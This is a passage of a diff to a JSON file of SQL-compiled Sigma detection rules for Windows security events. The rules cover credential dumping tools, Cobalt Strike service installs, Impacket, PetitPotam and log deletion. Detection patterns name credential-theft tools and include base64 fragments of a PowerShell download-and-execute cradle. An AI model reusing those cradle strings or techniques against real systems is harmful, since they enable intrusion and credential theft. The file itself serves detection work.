TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID 
= '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." 
], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, 
and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Scheduled Task 
Deletion", + "id": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "status": "experimental", + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "author": "David Strassegger, Tim Shelton", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "car.2013-08-001", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installation" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4699' AND NOT ((TaskName LIKE '\\\\Microsoft\\\\Windows\\\\RemovalTools\\\\MRT\\_ERROR\\_HB' ESCAPE '\\') OR (TaskName LIKE '%\\\\Mozilla\\\\Firefox Default Browser Agent %' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_scheduled_task_deletion.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", - "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - 
"attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin 
in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. 
This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ "attack.persistence", - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.t1134.005" ], "falsepositives": [ - "Unknown" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Outgoing Logon with New Credentials", + "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], + "description": "Detects logon events that specify new credentials", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate remote administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" ], - "filename": 
"file_delete_win_delete_prefetch.yml" + "filename": "win_security_susp_logon_newcredentials.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "status": "experimental", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "If source account name is not an admin then its super suspicious" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + 
"filename": "win_security_account_discovery.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Legitime usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": 
"PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", - "status": "experimental", - "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", + "status": "test", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), 
Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "During uninstallation of the IIS service", - "During log rotation" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. 
(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 
character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "TeamViewer Log File Deleted", - "id": "b1decb61-ed83-4339-8e95-53ea51901720", - "status": "test", - "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", - "author": "frack113", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "status": "experimental", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." 
], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\TeamViewer\\_%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_teamviewer_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
